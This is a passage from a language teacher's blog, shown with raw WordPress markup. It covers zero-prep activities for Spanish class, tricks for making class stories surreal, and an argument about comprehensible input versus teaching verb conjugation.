6&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1539687078&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;4.15&quot;,&quot;iso&quot;:&quot;64&quot;,&quot;shutter_speed&quot;:&quot;0.033333333333333&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="img_1117" data-image-description="" data-medium-file="https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1117.jpg?w=300" data-large-file="https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1117.jpg?w=620" src="https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1117.jpg?w=620" class="size-full wp-image-11155" srcset="https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1117.jpg?w=620 620w, https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1117.jpg?w=1240 1240w, https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1117.jpg?w=150 150w, https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1117.jpg?w=300 300w, https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1117.jpg?w=768 768w, https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1117.jpg?w=1024 1024w" sizes="(max-width: 620px) 100vw, 620px" ></p> <p><strong>The Partner Diagram</strong></p> <p>My beginner student Khushi, taking a cue from her Spanish teacher, said&nbsp;<em>yo tengo seis novios</em> (&#8220;I have six boyfriends&#8221;). So of course we had to draw and discuss them.&nbsp; For this, we first drew Khushi, taking some liberties (she is hideous, has three eyes, and two noses). Then we added five boyfriends and one girlfriend. Then we invented weird characteristics for each (Hairie has no mouth; Alberto has short legs, etc).</p> <p>The Q&amp;A here involves&nbsp;<em>tiene</em>, body parts, and the relationships between them.&nbsp; So Adam is scared of Khushi (even though they are dating) and Atam is scared of Alberto.</p> <p><img data-attachment-id="11160" data-permalink="https://tprsquestionsandanswers.wordpress.com/2018/10/24/no-prep-no-prob-%f0%9f%98%84%f0%9f%98%84/img_1114/" data-orig-file="https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1114.jpg" data-orig-size="3264,2448" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;2.2&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;iPhone 6&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1539613265&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;4.15&quot;,&quot;iso&quot;:&quot;40&quot;,&quot;shutter_speed&quot;:&quot;0.033333333333333&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="img_1114" data-image-description="" data-medium-file="https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1114.jpg?w=300" data-large-file="https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1114.jpg?w=620" src="https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1114.jpg?w=620" class="size-full wp-image-11160" srcset="https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1114.jpg?w=620 620w, https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1114.jpg?w=1240 1240w, https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1114.jpg?w=150 150w, https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1114.jpg?w=300 300w, https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1114.jpg?w=768 768w, https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1114.jpg?w=1024 1024w" sizes="(max-width: 620px) 100vw, 620px" ></p> <p><strong>The Personal Story (with picture)</strong></p> <p>This was inspired by Beniko Mason&#8217;s Story Listening method, which is &#8220;pure C.I.&#8221;&#8211; no &#8220;activities&#8221; after input. Basically, you tell a short story about yourself (or somebody famous), and you use 1-3 drawings to illustrate</p> <p><img data-attachment-id="11165" data-permalink="https://tprsquestionsandanswers.wordpress.com/2018/10/24/no-prep-no-prob-%f0%9f%98%84%f0%9f%98%84/img_1099-1/" data-orig-file="https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1099-1.jpg" data-orig-size="3264,2448" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;2.2&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;iPhone 6&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1539339404&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;4.15&quot;,&quot;iso&quot;:&quot;80&quot;,&quot;shutter_speed&quot;:&quot;0.033333333333333&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="img_1099-1" data-image-description="" data-medium-file="https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1099-1.jpg?w=300" data-large-file="https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1099-1.jpg?w=620" src="https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1099-1.jpg?w=620" class="size-full wp-image-11165" srcset="https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1099-1.jpg?w=620 620w, https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1099-1.jpg?w=1240 1240w, https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1099-1.jpg?w=150 150w, https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1099-1.jpg?w=300 300w, https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1099-1.jpg?w=768 768w, https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1099-1.jpg?w=1024 1024w" sizes="(max-width: 620px) 100vw, 620px" ></p> <p>Here, we have vocab on the left and my Grade 8 math teacher, Mr McKay, on the left.&nbsp; I started by describing 13 year-old me, and school, and math class.&nbsp; Then I drew Mr McKay. Then I told how he both looooooved coffee and cigars and was blissfully unaware of the existence of dental hygiene.&nbsp; As a result, we didn&#8217;t ask him questions&#8211; he could kill bacteria from ten feet away with that dragon&#8217;s breath&#8211; so as a result I got a C minus.</p> <p>Here, we just tell a one-scene story and we do Q&amp;A about both the story and the pictures.</p> <p>(By the way the art was inspired by Stephen Krashen&#8217;s <a href="https://www.youtube.com/watch?v=jaCdNTurH1k">famous C.I. demo</a>.)</p> <p><strong>Comic Panel</strong></p> <p>Here, we draw a one-panel comic and include basic dialogue. Khushi said&nbsp;<em>I&#8217;m getting 90% or more in Spanish</em> and we argued a bit and I drew this. Note that my art is so staggeringly bad that&nbsp;<em>I had to label Khushi and me.</em></p> <p><img data-attachment-id="11167" data-permalink="https://tprsquestionsandanswers.wordpress.com/2018/10/24/no-prep-no-prob-%f0%9f%98%84%f0%9f%98%84/img_1182-1/" data-orig-file="https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1182-1.jpg" data-orig-size="3100,2131" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;2.2&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;iPhone 6&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1540303286&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;4.15&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.033333333333333&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="img_1182-1" data-image-description="" data-medium-file="https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1182-1.jpg?w=300" data-large-file="https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1182-1.jpg?w=620" src="https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1182-1.jpg?w=620" class="size-full wp-image-11167" srcset="https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1182-1.jpg?w=620 620w, https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1182-1.jpg?w=1240 1240w, https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1182-1.jpg?w=150 150w, https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1182-1.jpg?w=300 300w, https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1182-1.jpg?w=768 768w, https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1182-1.jpg?w=1024 1024w" sizes="(max-width: 620px) 100vw, 620px" ></p> <p>Again we will do Q&amp;A here.&nbsp; We can also recycle by erasing dialogue and adding other words.</p> <p>When I finished with these, I took these photos.&nbsp; They will be added to <a href="https://tprsquestionsandanswers.wordpress.com/2016/12/14/soap-operas-hells-yea/">the class soap opera</a> (pasted into an MS-Word document) and printed.</p> <p><strong>Una Encuesta</strong> (a survey)</p> <p><img data-attachment-id="11196" data-permalink="https://tprsquestionsandanswers.wordpress.com/2018/10/24/no-prep-no-prob-%f0%9f%98%84%f0%9f%98%84/img_1382/" data-orig-file="https://tprsquestionsandanswers.files.wordpress.com/2018/11/img_1382.jpg" data-orig-size="2448,2448" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;2.2&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;iPhone 6&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1542882843&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;4.15&quot;,&quot;iso&quot;:&quot;125&quot;,&quot;shutter_speed&quot;:&quot;0.033333333333333&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="img_1382" data-image-description="" data-medium-file="https://tprsquestionsandanswers.files.wordpress.com/2018/11/img_1382.jpg?w=300" data-large-file="https://tprsquestionsandanswers.files.wordpress.com/2018/11/img_1382.jpg?w=620" src="https://tprsquestionsandanswers.files.wordpress.com/2018/11/img_1382.jpg?w=620" class="size-full wp-image-11196" srcset="https://tprsquestionsandanswers.files.wordpress.com/2018/11/img_1382.jpg?w=620 620w, https://tprsquestionsandanswers.files.wordpress.com/2018/11/img_1382.jpg?w=1240 1240w, https://tprsquestionsandanswers.files.wordpress.com/2018/11/img_1382.jpg?w=150 150w, https://tprsquestionsandanswers.files.wordpress.com/2018/11/img_1382.jpg?w=300 300w, https://tprsquestionsandanswers.files.wordpress.com/2018/11/img_1382.jpg?w=768 768w, https://tprsquestionsandanswers.files.wordpress.com/2018/11/img_1382.jpg?w=1024 1024w" sizes="(max-width: 620px) 100vw, 620px" ></p> <p>This is an old idea from textbooks. We take any subject&#8211; here, how kids feel about classes&#8211; and survey them. So I said <em>raise your hand if you find Spanish interesting</em> and then <em>raise your hand if you find Spanish boring </em>😜<em>. </em></p> <p>I then talked about what were overall favorite/least favorite subjects etc. I was also able to ask a lot of comparison questions such as <em>which class is more boring, Math or Spanish? </em>and <em>what is the most/least boring/interesting class?</em></p> <p>This emerged organically out of me asking Justin <em>¿cómo son las matemáticas: interesantes o aburridas?</em> during opening routine. You could make this waaaaay more interesting: who&#8217;s the most/least _____ celebrity? You could survey class members and (treading with emotional care), find out what 4-6 kids like, whether they like ____ etc.</p> <p>The basic system is, value judgements go across the top (eg good idea or bad idea, fun or boring, useful or pointless). Things being evaluated go down the side (eg swimming with shoes on, doing hwk in the bathtub, etc).</p> <p><strong>Picturetalk Plus Survey</strong> is another fun thing. Today Abdullah drew this:</p> <p><img data-attachment-id="11204" data-permalink="https://tprsquestionsandanswers.wordpress.com/2018/10/24/no-prep-no-prob-%f0%9f%98%84%f0%9f%98%84/img_1399-1/" data-orig-file="https://tprsquestionsandanswers.files.wordpress.com/2018/11/img_1399-1.jpg" data-orig-size="2983,1702" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;2.2&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;iPhone 6&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1543314786&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;4.15&quot;,&quot;iso&quot;:&quot;80&quot;,&quot;shutter_speed&quot;:&quot;0.033333333333333&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="img_1399-1" data-image-description="" data-medium-file="https://tprsquestionsandanswers.files.wordpress.com/2018/11/img_1399-1.jpg?w=300" data-large-file="https://tprsquestionsandanswers.files.wordpress.com/2018/11/img_1399-1.jpg?w=620" src="https://tprsquestionsandanswers.files.wordpress.com/2018/11/img_1399-1.jpg?w=620" class="size-full wp-image-11204" srcset="https://tprsquestionsandanswers.files.wordpress.com/2018/11/img_1399-1.jpg?w=620 620w, https://tprsquestionsandanswers.files.wordpress.com/2018/11/img_1399-1.jpg?w=1240 1240w, https://tprsquestionsandanswers.files.wordpress.com/2018/11/img_1399-1.jpg?w=150 150w, https://tprsquestionsandanswers.files.wordpress.com/2018/11/img_1399-1.jpg?w=300 300w, https://tprsquestionsandanswers.files.wordpress.com/2018/11/img_1399-1.jpg?w=768 768w, https://tprsquestionsandanswers.files.wordpress.com/2018/11/img_1399-1.jpg?w=1024 1024w" sizes="(max-width: 620px) 100vw, 620px" ></p> <p>So we Picturetalked talked this dragon. Then, we did a survey: if you had your own dragon, what would you do with it? Here is what the 1s came up with. <img data-attachment-id="11205" data-permalink="https://tprsquestionsandanswers.wordpress.com/2018/10/24/no-prep-no-prob-%f0%9f%98%84%f0%9f%98%84/img_1401/" data-orig-file="https://tprsquestionsandanswers.files.wordpress.com/2018/11/img_1401.jpg" data-orig-size="3264,1802" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;2.2&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;iPhone 6&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1543329162&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;4.15&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.033333333333333&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="img_1401" data-image-description="" data-medium-file="https://tprsquestionsandanswers.files.wordpress.com/2018/11/img_1401.jpg?w=300" data-large-file="https://tprsquestionsandanswers.files.wordpress.com/2018/11/img_1401.jpg?w=620" src="https://tprsquestionsandanswers.files.wordpress.com/2018/11/img_1401.jpg?w=620" class="size-full wp-image-11205" srcset="https://tprsquestionsandanswers.files.wordpress.com/2018/11/img_1401.jpg?w=620 620w, https://tprsquestionsandanswers.files.wordpress.com/2018/11/img_1401.jpg?w=1240 1240w, https://tprsquestionsandanswers.files.wordpress.com/2018/11/img_1401.jpg?w=150 150w, https://tprsquestionsandanswers.files.wordpress.com/2018/11/img_1401.jpg?w=300 300w, https://tprsquestionsandanswers.files.wordpress.com/2018/11/img_1401.jpg?w=768 768w, https://tprsquestionsandanswers.files.wordpress.com/2018/11/img_1401.jpg?w=1024 1024w" sizes="(max-width: 620px) 100vw, 620px" ></p> <p><strong>ANYWAY&#8230;I hope you can use and enjoy these zero-prep activities.&nbsp; Got any more ideas? Email me or leave a comment.</strong></p> </div><!-- .entry-content --> <footer class="entry-meta"> Posted in <a href="https://tprsquestionsandanswers.wordpress.com/category/circling-2/" rel="category tag">Circling</a>, <a href="https://tprsquestionsandanswers.wordpress.com/category/comprehensible-input-2/" rel="category tag">Comprehensible Input</a>, <a href="https://tprsquestionsandanswers.wordpress.com/category/fun/" rel="category tag">Fun</a>, <a href="https://tprsquestionsandanswers.wordpress.com/category/great-ideas/" rel="category tag">Great Ideas</a>, <a href="https://tprsquestionsandanswers.wordpress.com/category/less-is-more/" rel="category tag">Less Is More</a>, <a href="https://tprsquestionsandanswers.wordpress.com/category/personalisation/" rel="category tag">Personalisation</a>, <a href="https://tprsquestionsandanswers.wordpress.com/category/personalised-questions-answers-pqa/" rel="category tag">Personalised Questions &amp; Answers (PQA)</a>, <a href="https://tprsquestionsandanswers.wordpress.com/category/repetition/" rel="category tag">Repetition</a>, <a href="https://tprsquestionsandanswers.wordpress.com/category/soap-operas/" rel="category tag">Soap Operas</a>, <a href="https://tprsquestionsandanswers.wordpress.com/category/stephen-d-krashen/" rel="category tag">Stephen D. Krashen</a>, <a href="https://tprsquestionsandanswers.wordpress.com/category/story-listening/" rel="category tag">Story Listening</a>, <a href="https://tprsquestionsandanswers.wordpress.com/category/uncategorized/" rel="category tag">Uncategorized</a>, <a href="https://tprsquestionsandanswers.wordpress.com/category/unsheltered-grammar-2/" rel="category tag">Unsheltered Grammar</a>, <a href="https://tprsquestionsandanswers.wordpress.com/category/zero-prep/" rel="category tag">Zero Prep</a> <span class="on-date"> on <a href="https://tprsquestionsandanswers.wordpress.com/2018/10/24/no-prep-no-prob-%f0%9f%98%84%f0%9f%98%84/" title="11:52 pm" rel="bookmark"><time class="entry-date" datetime="2018-10-24T23:52:54+00:00">October 24, 2018</time></a></span><span class="by-author"> by <span class="author vcard"><a class="url fn n" href="https://tprsquestionsandanswers.wordpress.com/author/cstolztprs/" title="View all posts by cstolztprs" rel="author">cstolztprs</a></span></span>. <a href="https://tprsquestionsandanswers.wordpress.com/2018/10/24/no-prep-no-prob-%f0%9f%98%84%f0%9f%98%84/#comments">14 Comments</a> </footer><!-- .entry-meta --> </article><!-- #post-# .#post-class-# --> <article id="post-11137" class="post-11137 post type-post status-publish format-standard hentry category-stories-2 category-uncategorized category-unsheltered-grammar-2"> <a href="https://tprsquestionsandanswers.wordpress.com/2018/09/13/some-weirdness-tricks/" rel="bookmark"> <header class="entry-header"> <h1 class="entry-title">Some Weirdness Tricks</h1> </header><!-- .entry-header --> </a> <div class="entry-content"> <p><img src="https://i0.wp.com/blog.artsome.co/wp-content/uploads/2015/10/Surrealism-Featured.jpg" alt="Surrealism 101: All the Surrealist Art you need to see today"></p> <p>You want to make the story/character more interesting. The <em>best</em> way is to use Slavic and Hargaden&#8217;s &#8220;Invisibles,&#8221; which gives students a way to drive the C.I. bus.&nbsp; What kids think is funny, interesting, etc is&nbsp;<em>always</em> funnier than what we teachers think is funny or interesting.</p> <p><strong>BUT&#8230;</strong>if your class story needs a boost, you can try these 😄. Take something normalish, and do any of the following. The key to surrealism is to take <em>one or two</em> weird things and add them into something otherwise prosaic, and deliver it enthusiastically but also deadpan straight-face.&nbsp; As Spike Jonze says, <em>&#8220;when you replace a&nbsp;C-sharp&nbsp;with a&nbsp;gunshot, it has to be a&nbsp;C-sharp gunshot&nbsp;or it sounds awful.&#8221;</em></p> <p>1. Character has an unusual number of normal possessions (eg 39 cats).</p> <p>2. Character has a part-possession (eg Ravneet has half a boyfriend; Dave has 1.5 cars). Even more fun if you draw them.</p> <p>3. Character does a normal activity in a weird place (eg Suhail cooks in the shower; Mr Stolz marks Spanish stories whilst scuba diving).</p> <p>4. People or objects have unusual colours or textures etc (eg the boy had a hard pillow; the girl has a green girlfriend but wants a blue one; the French fries were delicious because they were sweet).</p> <p><a href="https://en.m.wikipedia.org/wiki/Wikipedia:Unusual_place_names">5. Unusual place names</a> are <em>always</em> fun. I mean, who wouldn&#8217;t want to buy a pizza in Eighty Four, Pennsylvania?</p> <p>6. Normal places do unusual things (eg a school teaches flirting, a shooting range only allows waterguns, a wedding chapel only marries penguins).</p> <p>7. Normal things have unusual functions (eg Mr Stolz swims with a mandolin, Mandeep cooks with an iPhone).</p> <p>8. Try a surrealism generator from <a href="https://www.google.ca/amp/s/thinkostudio.wordpress.com/2009/03/11/14-random-generators-you-need-to-know-about/amp/">this list</a>.</p> <p>9. Use a stock story&#8211; fairy tale, movie, fable&#8211; and modernise it. Eg Cinderella, but the protagonist is a boy and he wins a ticket to a show through Instagram, where the rapper sees him and falls in love with him.</p> <p>10. Use a stock story but change the ending. Eg in &#8220;The Three Little Pigs,&#8221; the pig who builds the brick house dies of exhaustion and the wolf comes and eats him, while his brothers vacation in the Bahamas.</p> <p>11. Repurpose well-known brands, stores etc. Eg the man owns a Pringles car and a Ferrari bicycle.</p> <p>12. Transfer human qualities to animals (eg the Blaine Ray story where a horse in school&nbsp; studies Math, History and Horse<strong>. </strong>These are often student favorites.</p> <p>13. Retell a stock story/film etc using animals, toys etc.</p> <p>14. Celebrities have superpowers and/or weaknesses (eg Chance the Rapper is scared of cats; Lil Pump can eat thirty pounds of spinach). Even better: find something real and socially cool but not obvious that a celebrity does (eg Barack Obama likes craft beer).</p> <p>15. Your student/the character/you the teacher beats a world record (actually look them up). The world record is factual; the in-class achievement is not. Eg Mr Stolz deadlifted 1200 lb (word record is 1020 lb or so); Mandeep skied from the Moon to Earth (world record is from top of Everest).</p> <p>Variation: the world record is ridiculous.&nbsp; Eg John has lost the most toy cars; Mr Smith has forgotten to mark the most assignments; Suzie has slept in the longest.</p> <p>16. Ironic inversion: flip ONE element of a world around (there was a cat who had three pet boys and a snake who had a pet Spanish teacher). For a brilliant take on this, read Martin Amis&#8217;&nbsp;<strong>Time&#8217;s Arrow</strong> or his&nbsp;<strong>Heavy Water</strong> short stories).</p> <p>17. Things take the wrong amount of time, quantity, effort, etc (eg the boy drove from Alaska to Hawaii; the girl became a doctor in 97 years; the monkey easily ate 497 bananas).</p> <p>18. Language (an idea from Blaine Ray and Karen Rowan): John speaks English, Miguel speaks Spanish, but their dog speaks Dog.&nbsp; This is a problem, because John does not speak Dog.</p> <p>19. Brand name changes. Your characters don&#8217;t play Fortnite and Call of Duty&#8230;they play Nortfite and Call of Shooting, and they buy it at Mal-Wart, to which they drive in a Fard Mastong. Great for some decommodification!</p> <p>20. Name changes #2: switch first and last names. My student Gaurav wanted to name a female character Nicholas Cage. I said, <em>Nicholas Cage is a man</em>, so Gaurav said, <em>fine: Cage Nicholas </em>🤣🤣<em>. </em>So we now have Cage Nicholas, Rapper the Chance, Pump Lil and so on.</p> <p>21. Ethnicity jokes that kids are OK with (ie not racist etc). Eg in my class, lots of kids speak Punjabi. So we sometimes do stories where a Punjabi kid (one who looks Punjabi, has a Punjabi name, etc) eg does not speak Punjabi, while eg a white kid is fluent in it but speaks no English. Kids have very funny observations about their (and others&#8217;) cultures. Indeed, I am often reminded of Korean-American comedienne Margaret Cho&#8217;s references to her Korean mother, and Canadian Russell Peters&#8217; hilarious riffing on his Indian father (see this&#8211; the whole thing is good but <a href="https://youtu.be/VxyLwYB494c">the parenting bit at 39:15 is brilliant</a>).</p> <p>You have to tread carefully here but it is a lot of fun: most of us have heard or experienced ethnic &#8220;humour&#8221; as racism. Doing it for surreal purposes can make for great stories. Above all, if any remotely privileged teacher (eg me: white, able-bodied, cis, het etc Canadian male) is going to play around with this, <em>we must first ask anybody of a different ethnicity, language etc</em> if it&#8217;s OK. And we <em>never</em> want to make any religious, ethnic etc references which show or hint at oppressive power structures <em>unless we are visibly critical of those power structures. </em></p> <p>22. Similar to 21, reverse-stereotype humor can be lots of fun. Eg: the male <em>sacaplatas</em> who just wants a sugar-mama, the &#8220;wigga&#8221; (white kid who thinks he/she&#8217;s a rapper from the &#8216;hood), the straight white guy who loves to dance, the football player who loves ballet, etc. Humour is a <em>great</em> way to let all of us see how absurd most stereotypes and roles are.</p> <p>23. Blaine Ray has experimented with &#8220;teacher-as-character&#8221; and I love this. I make myself 70% real&#8211; eg when school ends, I ride my bike home, climb, mark etc&#8211; and 30% surreal. For example, my girlfriend comes from L.A. to Surrey for dinner in her Farreri in 28 minutes because there is good Indian food here (true). The mix of truth and total fabrication is where the fun really is.</p> <p>&nbsp;</p> </div><!-- .entry-content --> <footer class="entry-meta"> Posted in <a href="https://tprsquestionsandanswers.wordpress.com/category/stories-2/" rel="category tag">Stories</a>, <a href="https://tprsquestionsandanswers.wordpress.com/category/uncategorized/" rel="category tag">Uncategorized</a>, <a href="https://tprsquestionsandanswers.wordpress.com/category/unsheltered-grammar-2/" rel="category tag">Unsheltered Grammar</a> <span class="on-date"> on <a href="https://tprsquestionsandanswers.wordpress.com/2018/09/13/some-weirdness-tricks/" title="6:22 am" rel="bookmark"><time class="entry-date" datetime="2018-09-13T06:22:57+00:00">September 13, 2018</time></a></span><span class="by-author"> by <span class="author vcard"><a class="url fn n" href="https://tprsquestionsandanswers.wordpress.com/author/cstolztprs/" title="View all posts by cstolztprs" rel="author">cstolztprs</a></span></span>. <a href="https://tprsquestionsandanswers.wordpress.com/2018/09/13/some-weirdness-tricks/#comments">2 Comments</a> </footer><!-- .entry-meta --> </article><!-- #post-# .#post-class-# --> <article id="post-11110" class="post-11110 post type-post status-publish format-standard hentry category-comprehensible-input-2 category-criticism-of-t-p-r-s category-focus-on-form category-grant-boulanger category-legacy-methods category-output-2 category-textbooks category-traditional-methods category-uncategorized category-verb-forms"> <a href="https://tprsquestionsandanswers.wordpress.com/2018/07/03/but-they-cant-conjugate-verbs/" rel="bookmark"> <header class="entry-header"> <h1 class="entry-title">But They Can’t Conjugate&nbsp;Verbs!</h1> </header><!-- .entry-header --> </a> <div class="entry-content"> <p><img src="https://i0.wp.com/images.clipartpanda.com/disgust-clipart-sp_angry_rgb.jpg" alt="Image result for angry spanish teacher" /></p> <p><em>(I looked for an image for upset Spanish teacher and this was all I got)</em></p> <p>Here is a comment from the SPANISH TEACHERS IN THE US page on Facebook. Here, Dan brings up a classic argument between a more traditional language teacher and a C.I. practitioner</p> <p>Here is a response to a discussion about whether or not C.I. delivers better results than does the textbook:</p> <p><img data-attachment-id="11109" data-permalink="https://tprsquestionsandanswers.wordpress.com/2018/07/03/but-they-cant-conjugate-verbs/img_0433/" data-orig-file="https://tprsquestionsandanswers.files.wordpress.com/2018/07/img_0433.jpg" data-orig-size="658,466" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="img_0433" data-image-description="" data-medium-file="https://tprsquestionsandanswers.files.wordpress.com/2018/07/img_0433.jpg?w=300" data-large-file="https://tprsquestionsandanswers.files.wordpress.com/2018/07/img_0433.jpg?w=620" class="alignnone wp-image-11109 size-full" src="https://tprsquestionsandanswers.files.wordpress.com/2018/07/img_0433.jpg?w=620" srcset="https://tprsquestionsandanswers.files.wordpress.com/2018/07/img_0433.jpg?w=620 620w, https://tprsquestionsandanswers.files.wordpress.com/2018/07/img_0433.jpg?w=150 150w, https://tprsquestionsandanswers.files.wordpress.com/2018/07/img_0433.jpg?w=300 300w, https://tprsquestionsandanswers.files.wordpress.com/2018/07/img_0433.jpg 658w" sizes="(max-width: 620px) 100vw, 620px" /></p> <p>My <strong>first question</strong> to Dan&#8217;s interlocutor&#8211; the teacher who has inherited some C.I.-taught kids who can&#8217;t conjugate <em>saber</em>&#8212; is, <strong>what do you mean by &#8220;conjugate?&#8221;</strong></p> <p>If we mean, <em>can we tell the kid &#8220;conjugate the verb saber in the present indicative yo a.k.a. first person form&#8221; and can they do it?</em>, the answer might well be no. This is because consciously knowing</p> <ol> <li>what an infinitive is</li> <li>what conjugating is</li> <li>what first person is</li> <li>the rule</li> </ol> <p>is what we would call conscious knowledge&#8211; Bill VanPatten calls it &#8220;explicit knowledge&#8221; and Krashen &#8220;Monitor awareness.&#8221; Neither of these have anything to do with the subconscious linguistic system where language is acquired, processed and stored. We can successfully <em>use</em> a variety of grammar &#8220;rules&#8221;&#8211; such as saying &#8220;<em>I am</em>&#8221; instead of &#8220;<em>I are,</em>&#8220;, or &#8220;<em>I enjoy running</em>&#8221; instead of &#8220;<em>I enjoy to run</em>&#8220;&#8211; without knowing (or even having been taught the rule).</p> <p>As Bob Patrick says, <em>conjugate the verb to run in the pluperfect passive third person progressive</em>. Can you do this? Really?  You mean you can&#8217;t say <em>the race had been being run</em> on demand?</p> <p>Knowing the &#8220;rules,&#8221; and how and when and where to apply them, does not guarantee successful production of language.</p> <p>As Jason Rothman (2008) write,<em> “Variation in language use is simply a fact of all output, native and non-native. As a result, any given linguistic performance does not always accurately represent underlying competence.”</em></p> <p>My <strong>second question</strong> to Dan&#8217;s interlocutor is, <strong>can</strong><strong> textbook-taught kids produce this&#8211; or any other verbform&#8211; on demand better than C.I. taught kids? </strong>Maybe. It&#8217;s possible that Johnny&#8217;s Spanish teacher has hammered away at verb tables bla bla bla and Johnny, that eager beaver, has spent countless hours studying, and can now say &#8220;right, &#8212;<em>er</em> verb, first person, irregular, lemme see, uh, <em>sé.&#8221;</em></p> <p>The real question, however, is <i>do they do it without being asked to do it, ie in real-time, unrehearsed communication?</i> If my experience of 12 years with the text is a guide, no, absolutely not, and the same goes true for writing. Kids taught with textbooks and a focus on grammar rules memorise dialogues, and they do not produce very much (nevermind very much <em>good</em>) written language spontaneously.  <a href="https://tprsquestionsandanswers.wordpress.com/2016/01/21/t-p-r-s-1-legacy-methods-0-more-evidence-how-well-c-i-works/">Here is an example of just how grammatically accurate kids taught with C.I. can be.</a></p> <p>My <strong>third question</strong> to Dan&#8217;s interlocutor is, <strong>what cost does an obsession with perfect grammatical output carry?<em> </em></strong>If Johnny&#8217;s Spanish teacher gets the kids to obsess over verb tables, that means they <em>won&#8217;t</em> be either &#8220;practising&#8221; other grammar, or&#8211; worse&#8211; getting input. There will also be a cost to students&#8217; enjoyment of Spanish: reading/watching good stories is <em>way</em> more fun than doing tedious grammar stuff, correcting one&#8217;s writing, etc.  And <em>this</em> means that students who end up in grammar and textbook programs drop out more, as <a 